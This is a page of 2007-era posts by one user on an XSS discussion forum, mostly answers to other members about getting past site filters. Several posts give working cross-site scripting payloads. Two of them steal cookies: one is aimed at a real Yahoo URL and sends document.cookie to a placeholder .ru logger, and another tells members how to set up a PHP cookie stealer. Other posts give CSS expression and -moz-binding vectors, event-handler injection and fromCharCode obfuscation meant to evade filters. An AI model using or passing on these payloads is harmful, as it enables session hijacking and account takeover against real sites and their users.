Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 

Current Page: 1 of 5
Results 1 - 30 of 149
7 years ago
hasse
I have the book!
Forum: XSS Info
7 years ago
hasse
My order shipped today, estimated arrival time is 8 June 2007.
Forum: XSS Info
7 years ago
hasse
Mephisto Wrote:
> Sorry, I wasn't addressing the (<, ") encoding in my response. If the application is doing HTML Encoding (converting < or %3c to &lt;) then you're pretty much out of luck.

Unless you can create the XSS inside the tag.
Forum: XSS Info
7 years ago
hasse
digitalIllusionism Wrote:
> @hasse:
> Isn't this byte 219?
> Momby's example is functional. I'm not certain where I would specify a length value, but I only overwrote between "" and "", rather than changing the length. In other words: My string is precisely the same size as Momby's, so
Forum: CSRF and Session Info
7 years ago
hasse
Couldn't you do something like: document.body.innerHTML.replace(input,output); And then add the CSS or other parts you may lose.
Forum: XSS Info
7 years ago
hasse
digitalIllusionism Wrote:
> > Use a hex editor to edit the file and go to byte number 219 (the first byte being byte 0)."
>
> I thought a hex editor was any text editor designed for coding. I've made progress by learning what a hex editor is. Thank you. I haven't been successful at usin
Forum: CSRF and Session Info
7 years ago
hasse
How about setting a chrome URL as the homepage somehow? I tried it and I had to edit the config files by hand to stop it from crashing constantly.
Forum: CSRF and Session Info
7 years ago
hasse
digitalIllusionism Wrote:
> That's the part I don't get. I see no part in the example that resembles the structure of the string "0xdb" in the example. I know "0x" denotes the beginning of a memory address but I don't see how that has anything to do with getting this functional. It looks like
Forum: CSRF and Session Info
7 years ago
hasse
mynice Wrote:
> Ehrmmm... JavaScript is fully enabled (no script blockers or similar) in Firefox2 and IE6. It doesn't execute in both browsers. :(
>
> Edit: The "alert(String.fromCharCode(88,83,83))" even shows up as a message. I can see this injection string as message text. Exactly how d
Forum: XSS Info
7 years ago
hasse
fireboy Wrote:
> none of those solutions work kishord

Does something like this work? http://business.cn.yahoo.com/bso?p=&pid="><script>document.write("<img src=http://site.ru/log.php?"%2Bdocument.cookie%2B">")</script>&ei=UTF-8&ch=ch

You should be able to do that via an
Forum: XSS Info
7 years ago
hasse
hwEll Wrote:
> Yeah I know that but am asking the code too..

Just do a Google search for something like "php cookie stealer" and you'll find one.
Forum: XSS Info
7 years ago
hasse
You need a simple PHP script that basically writes the GET-parameters to a file. And then you need to make the user load your PHP script with the cookie as a parameter. For example: http://www.site.com/search.php?q=<script>document.write("<img src=http://your-site.ru/stealer.php?"+document.cookie+">")</script>
Forum: XSS Info
7 years ago
hasse
Try this: style=-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);xx:expression(alert(1111))
Forum: XSS Info
7 years ago
hasse
Delixe Wrote:
> Yes but how is it possible to execute any XSS without a native tag? I can't use the < in my URL, it gets stripped completely.

Like some other people have mentioned, if you can input data inside tags it's possible. For example: <a href=YOUR_INPUT>Link</a> Just enter "# onmouseover=alert(1)
Forum: XSS Info
7 years ago
hasse
What if you try loading it as an iframe or image? EDIT: CrYpTiC_MauleR said it too...
Forum: XSS Info
7 years ago
hasse
I think this is quite common for sites like that. I've even found SQL-injections on other sites that show you your browser headers.
Forum: XSS Info
7 years ago
hasse
So the book's not quite done yet? Amazon says:
Availability: Usually ships within 1 to 3 weeks.
Shipping estimate: April 12, 2007 - April 16, 2007
Delivery estimate: April 25, 2007 - May 10, 2007
Forum: XSS Info
7 years ago
hasse
/nul Wrote:
> Hello,
>
> I found a site that is vulnerable to XSS via a POST parameter. I just can't reproduce the XSS any other way than by inserting a tag in the Search field. Yeah, I know about WhiteAcid's XSS POST Forwarder (http://www.whiteacid.org/misc/xss_post_forwarder.php). I tried some combinations, but
Forum: XSS Info
7 years ago
hasse
FR3DC3RV Wrote:
> The IE style vector turned into:
>
> <A style="xx: )" href="http://www.hi5.com/friend/profile/displaySameProfile.do?userid=107126449#">a</A>

Ok, how about: <a href=# style=xx:expr/*X*/ession(alert(1111))>a</a>
Forum: XSS Info
7 years ago
hasse
FR3DC3RV Wrote:
> @hasse:
> Yes hannil.freehostia.com worked for me. What I wanted to mean is that the style vectors weren't able to bypass the hi5 filter.

Ok, I understand. What part was filtered or what was the problem?
Forum: XSS Info
7 years ago
hasse
FR3DC3RV Wrote:
> The style vectors didn't work (at least for me).

Does this work for you in IE or Firefox? http://hannil.freehostia.com/style.html
Forum: XSS Info
7 years ago
hasse
DeltaOne Wrote:
> Well, they do block a variety of tags. And as FR3DC3RV said, they block 'ipt>alert(1000)), 'ipt>alert(1000)', leaving only ipt>alert(1000)
>
> What about the style vector? What are you referring to?

Something like this in Firefox: <a href=# style=-moz-binding:url(http://ha.c
Forum: XSS Info
7 years ago
hasse
DeltaOne Wrote:
> Well, I actually tried , and it rendered - I tried to find some way to obfuscate that tag.
>
> I don't think that they check for the endtag for the script to see if someone inserts the tags, because I can very easily add alert('omg!') (although it won't do anything, because doesn't &
Forum: XSS Info
7 years ago
hasse
lobas Wrote:
> Do you have any examples of how I can use this method, as in using document.location='http://site.com/c.php?c='+escape(document.cookie).substr(0,1900)

You can use document.write and String.fromCharCode. For example: <script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,100,
Forum: XSS Info
7 years ago
hasse
Well at least the other posts aren't expanded to the right too, like in many other forums. EDIT: Right!
Forum: XSS Info
7 years ago
hasse
@tx: I believe that was something other than what I was thinking about.

jungsonn Wrote:
> @hasse
>
> Do you mean the dojo toolkit crossdomain ajax requests?

Yes, perhaps that was it. I found a page here that describes it: http://tagneto.blogspot.com/2006/06/cross-domain-frame-communication-with.html
Forum: XSS Info
7 years ago
hasse
Hmm, I just remembered something I read about transferring data between domains using anchors (#), anyone remember what site that was on?
Forum: XSS Info
7 years ago
hasse
trev Wrote:
> The source code of what? My understanding is that this is reflexive XSS - the JavaScript code inside an image will not execute unless you open it in a frame or a new window and the site itself will hardly do that. You will have to put this frame inside a frame on your site and then there will b
Forum: XSS Info
7 years ago
hasse
trev Wrote:
> The image doesn't have to be malformed, many image formats allow putting comments into the images.
>
> If there is no session you cannot steal any information. You can only create a frame with a login form and hope the user types his password into it.

Couldn't he read the source code with
Forum: XSS Info
7 years ago
hasse
Mephisto Wrote:
> okay, found a site where I can put in "" and anything else like that (, , , etc...), but it won't allow the start tags (, , , , etc...) Anyone know of a way around this??
>
> It appears to filter anything that is < and any Aa-Zz character after that.
>
> Update: I c
Forum: XSS Info